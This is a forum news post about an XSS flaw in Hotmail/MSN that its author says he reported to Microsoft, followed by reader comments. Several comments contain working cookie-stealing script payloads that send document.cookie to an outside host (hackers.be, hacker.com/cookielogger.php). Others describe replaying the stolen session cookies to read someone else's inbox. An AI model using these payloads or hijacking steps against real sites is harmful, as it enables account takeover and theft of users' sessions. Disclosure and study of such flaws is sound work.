Posted by eierkoek - Friday June 3 @ 13:37
Update2: Looks like Microsoft changed the page, this one doesn't work anymore. But in other places on the site the same bug is still present.
Update: The tutorial is now online, read it on: www.net-force.nl/files/articles/hotmail_xss/. The exploit is still present. So go check it out, but don't abuse it! :)
During a little game on the Net-Force IRC channel, I found out many big sites are still vulnerable to certain exploits. With the game somebody had to give a Google search term, and the first hit (not being MS, Google or Hotmail) would be searched for exploits. The first person who found an exploit won the round. Although I played this game somewhat by myself (pretty sad, I know), nice sites like sp.nl, nasa.gov, sitestat.com, time.com, cbs.nl, linux.org, cia.gov, and about 9 other sites were all found vulnerable (but not necessarily exploitable). The next day (June 1), I thought, "wth, I'll just try Hotmail", in the belief Hotmail was almost unhackable. I had to search for about an hour and a half (unlike NASA and CIA, which only took me about 15 minutes), but with success. Together with Marijn I've tested my theory, and in no time I was reading the contents of his inbox. I've informed Microsoft of this security flaw, and I am writing a nice easy-to-understand tutorial: "How to hack hotmail" :)
The tutorial I'm writing will consist of two parts. One very easy-to-understand tutorial that also includes stuff like "faking a cookie", and a more technical tutorial where I presume you have enough knowledge to understand what I'm talking about. This tutorial will be written to prove the existence of the exploit, to let other people learn how to handle security and to demonstrate the consequences of a security flaw. Currently I'm giving Hotmail some time to respond to my mail, while in the meantime I can finish my tutorial.
I'm expecting a response from the Hotmail crew with a text like "We have fixed the security hole, thank you very much, can we hire you?" ;). When I've waited long enough (or when they have fixed the security flaw) I will put the tutorial online. I will let you know if the security hole is still exploitable when the tutorial comes online. Please note that hacking someone's e-mail inbox is against the law. I'm writing the tutorial as a "proof of concept". Do not hack somebody's inbox without his/her permission! Have fun at Net-Force and behave, Eierkoek
» Comments
LOL congrats with this victory:)
That is a nice hack!
well done Eierkoek!
You 2 rule!
micro$oft is pwned!
woehoew!
nice, nice!
even published sooner than anticipated, almost took me by surprise :)
me is wondering if 'people of net-force' is worth beer :D
Rhican
Nice man, but I thought that hotmail had secured this flaw by locking IP addresses to sessions?
Keep up the good work!
Whahahahahaha.... Hotmail gets hacked by Net Force!!!
w00t Hotmail got pwned! By net-force.nl hehe, never thought I'd be member of such a community =)
I'm also surprised you're a member of Net-Force :)
I'm sure microsoft will update the flaw.
I'm like 5min on the internet, and I already found
your articles on a security site. Grtz, mb I should log on to irc and say hi.
Yes, bug was fixed. Pretty fast, for Microsoft :)
But as said in the Update notice, there is at least one other place on MSN.com where it's still there...
I've read your paper 'bout the hack and thought, let's test it. And yeah, the cookie is hard to get atm because of the fix. But I still can get it, but only the last step, working with proxomitron... it won't work!
I've tested it, and it still works (with a different XSS hole). So I think you are doing something wrong with Proxomitron. Have you adjusted your browser settings to use your own proxy server?
yup, I did that, even tried ff... hm strange, I'll try it again, maybe a simple restart will work. I've got it all, but I want to see it working
where else on msn is it still working can anyone help
Nouto if it really doesn't work and can't figure out why start a topic in the general forum.
nice done,
it's even published on tweakers.net, you will become famous :-)
http://www.tweakers.net/nieuws/37593
GJ eierkoek!
Well done Eierkoek!
it has hit the news sites big time,
belgian newspapers, cnet, ...
too much to keep up.
Very nice...
Compliments.
Just heard you on the radio. Nice interview.
that's awesome *bows*
respect!
I was reading an article about this hack on www.standaard.be, a Belgian newspaper. In 5 minutes I found a similar bug on the site of the Standaard. I made a link and the person who clicks on it sends his password in plain text to my email.
That newspaper asks 120 euros a year to get access to the whole site... So they can't like it too much that someone has access to everyone's password.
It's quite funny that, one hour later, the article about 'how to hack hotmail' disappeared from their site :-)
If u like more info about the specific bug, u can mail me: benoitje AT gmail.com
Hehe, rather funny =D
Their site is still vulnerable I see (I found the hole myself too) . Saving usernames and passwords in their cookie, OMG, not even hotmail does that :P
indeed :-)
Can u mail me your hole? Let's see if it is the same.
@benoit: Check your PM inbox on net-force :)
When visiting the original location where it was posted (http://www.standaard.be/nieuws/economie/index.asp?articleID=DMF07062005_036&snel=1)
It says I have to be logged in to read the article
Oh, I thought they erased the article. When I log in, I can still read it.
@eierkoek: It's the same bug that I found, with a little adjustment to make it possible to redirect the page. I've sent my link to your PM.
just thought i'd jump in and mention that indeed and tell you all that i found it too.
not that hard if you know that it is there.. and you're not wasting effort ;)
Meanwhile, I've received a mail from 'de standaard' that their 'technical partner' was working on the bug. (the website is made by uniway.be)
30 minutes later it was fixed.
The method I used was the same as the one eierkoek describes in his tutorial. The link to send the cookie to my site was:
http://www.standaard.be/Archief/Zoeken/index.asp?hidden1=0&result=1&Trefwoord2=%3Cscript%3Ed%3D%22%3E%3Cscript%3Edocument.location=%22http%3A%2F%2Fwww.hackers.be%3Fcookie%3D%22%2Bescape%28document.cookie%29%3C%2Fscript%3E
Please don't discuss other bugs in this news post.
i wonder if they will find the other ones too by themselves...
they don't pay us enough to find them all for them
Does this bug/exploit still work or have they fixed it yet?
I tried testing it myself and it does not work.
Even when I click on
http://ilovemessenger.msn.com/?mkt=nl-nl');alert(document.cookie);escape('
my cookie doesn't show lol
I guess they fixed it?
yes, that particular XSS hole was 'fixed'
as mentioned in "Update2" at the top of this page
or somewhere in the top of the tutorial.
Well fixed... they took the site offline, I don't know if it's back yet actually.
Yeah, that one is fixed. They put the ilovemessenger website back online yesterday.
If you only knew..
Happiness is not so much in having as sharing. We make a living by what we get, but we make a life by what we give..
Generous of you to share this wisdom, but I would have appreciated it if you had kept this to yourself. This hack was already known to a select group and was only exploited when necessary. Notifying Micro$oft before making it public was a sensible move, since extensive abuse could not have been ruled out. Still, I'm not entirely happy with it; I had already written a script for this that removed a lot of manual steps, which can now go in the recycle bin.. Oh well, no hard feelings, but a bit of a shame.
Greetzz,
Steven
Then you surely also know there are more XSS exploits (no, I'm not giving them away) and you probably only need to change one little line in your script.
OK, relax. So they still exist? Then I'll go have a look.
Ok, i refrained myself from replying before, but there are a few things I want to say.
First of all, in case you didn't notice, this entire thread and in fact the entire site is in English. So it would be much appreciated if you continued in the same language. I know all too well how irritating it is when foreign languages are mixed in with English.
And secondly: there is no such thing as "exploited when absolutely necessary"
it's bogus and you know it, you are just annoyed because now you have one less 1337 trick you can show off with. Basically we don't care.
Also I don't think anybody was impressed by the fact that you wrote a script. Basically the entire world went like argh another script kiddie. Suck it up.
as far as analogies go: you would be the guy that is all sad because somebody told the headmaster that there is a peephole into the girls' locker room.
I have no respect for you, or your situation. I respect outsmarting the authority, beating the system, creative thinking, problem solving.
But like you said no hard feelings. And for pete's sake don't reply to this message. We both explained our views, and there is nothing to gain from ranting.
Yes I know "exploited when absolutely necessary" sounds a little crappy but I didn't explain myself, and you don't know for which cause.. but I've got the idea you don't give a damn so I won't bother you with that. Maybe you're right, and I'm whining, but there's still no need to express yourself in such an unkind manner. I'd really like analogies and have got a tasteful one in mind, but it's better to leave it there..
@eierkoek:
If you really are as good as I think you are, you MUST know Microsoft endures a MUCH larger threat! After a long night (ain't as fast as you) I just discovered something interesting.. In theory, if you exploit it right, you don't even need to send a mail in order to hijack the session. For now only the usual way will work but I'm dámn close.. I can feel it!! ;-) If I succeed I will provide you with a proof of concept! Another black day in Microsoft's history! :p
narrator: "a week passes by, nothing happened"
I noticed by playing around with my own hotmail cookie that using the cookie does work when faking the Headers but if the password is changed the original cookie fails. If the password is restored to what it was originally it still fails. I was using Proxomitron.
Ok I admit that I probably didn't understand your post completely: partly due to the fact that your first sentence contains 9 verbs. So if you think I'm an ass after replying to this message that I misunderstood, that's fine with me.
but far be it from me to complain about language usage ;)
a cookie is in fact an HTTP header, so when faking headers you must also fake the cookie, because if it isn't sent to the server, the server won't know its contents. Since it is common practice not to allow webservers to read your /cookies.
It is very possible that changing your password back and forth creates a different session, and thus renders the 'stolen' cookie useless. However in relation to this exploit method it isn't really important imho, most people don't even know how to change it anyway, and the rest is just lazy.
no pun intended, well not much anyway. ;-)
Ok, fair enough about the misunderstanding. Let me clarify.
Firstly, I signed in to my hotmail account.
I then did a javascript: alert in the address field and obtained my cookie.
I signed out of my hotmail account.
Then, I started Proxomitron and loaded the cookie into proxomitron as suggested and set my browser to the port of Proxomitron proxy server as needed.
I launched a new browser and typed in http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes into the address field. I was taken to my inbox.
This worked repeatedly.
I then shut down the Proxomitron and restored my browser to the normal settings. I logged into my hotmail account normally typing in a password and I changed the account password and signed out and closed the browser.
Now, going back to the Proxomitron, using the same cookie as before, it fails and takes me to a log-in page asking for a password.
That's pretty much it.
Ok, here's the thing:
what you do with these types of exploit is
session hijacking
someone logs in, and from that point you use that "session" of that user
when you are going to login and logout and change passwords it's pretty much certain that a new session will be started...
Makes sense. From what I read it is claimed that once you have the cookie you have access no matter what. This may be true but may require more knowledge of the cookie itself so portions of it could be edited or removed, I don't know.
I doubt Eierkoek wrote anywhere 'no matter what', but again I could be wrong.
If you read it on other sites, it is just to simplify and scare people, since scaring is money in this society.
Anyway, rest assured there is no 'no matter what' in this field of work. You steal a session, as long as the session exists you can access the account with it. Just study sessions to understand how it works.
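As an added example (not code from the thread, the tutorial, Hotmail or Proxomitron), here is a small constructed Python session store that shows the behaviour the last few comments describe: a copied session cookie is accepted exactly like the original until a password change rotates the session away, and restoring the old password does not bring the old session back. The HttpOnly/Secure cookie line is the defensive counterpart of the document.cookie read the injected script depends on; the account name and passwords are constructed sample values.

```python
import secrets

# Constructed demo store, not Hotmail's or Proxomitron's code; passwords are kept
# in plaintext only to keep the demo short.
class SessionStore:
    def __init__(self):
        self.sessions = {}   # session id -> username
        self.passwords = {}  # username -> password

    def register(self, user, password):
        self.passwords[user] = password

    def login(self, user, password):
        """Password login mints a fresh, unguessable session id."""
        if self.passwords.get(user) != password:
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = user
        return sid

    def whoami(self, cookie_value):
        """Cookie login only checks that the id exists, so a copied cookie (read
        via XSS or replayed in a forged Cookie header) works like the original."""
        return self.sessions.get(cookie_value)

    def change_password(self, user, old, new):
        """Rotate every session of the user on credential change; restoring the
        old password later does not revive the old id (as the commenter saw)."""
        if self.passwords.get(user) != old:
            return False
        self.passwords[user] = new
        for sid in [s for s, u in self.sessions.items() if u == user]:
            del self.sessions[sid]
        return True

def set_cookie_header(sid):
    """HttpOnly keeps the id out of document.cookie (the read the injected
    script relies on); Secure keeps it off plain HTTP."""
    return f"Set-Cookie: sid={sid}; Secure; HttpOnly"

def demo():
    store = SessionStore()
    store.register("victim", "hunter2")          # constructed sample account
    stolen = store.login("victim", "hunter2")    # the value an attacker copies
    before = store.whoami(stolen)                # "victim": replay works
    store.change_password("victim", "hunter2", "newpass")
    after = store.whoami(stolen)                 # None: session rotated away
    store.change_password("victim", "newpass", "hunter2")
    restored = store.whoami(stolen)              # still None
    return before, after, restored
```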
well done!
How did u find the exploit?
u must b gud
Well, I have got everything, and thanks for everything, but I haven't understood one paragraph, which is (Cookielogger.php is now ready to log text strings, so it's also ready to log cookies. I use the Cross Site Scripting exploit to inject a code that will redirect the user to http://www.hacker.com/cookielogger.php with the argument "cookie" filled with the user's cookie. So when the user visits the msn site with added code, he will be redirected to http://www.hacker.com/cookielogger.php?cookie=hiscookie and the hacker can read his cookie information at the site http://www.hacker.com/logfile.txt because "hiscookie" is now logged to a textfile the hacker can see. the code I'm inserting in msn.com will look like this:
<SCRIPT>location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>)
So can u please explain this to me!
Kind Regards
abdullahoriakhill308@hotmail.com
Hello,
Hacking HOTMAIL ACCOUNT DOES NOT WORK ANYMORE :( HELP!!
Personally, I'm just wondering if the "2nd" bug you guys found is still somewhere in MSN ?
It'd be a great training to find it myself :)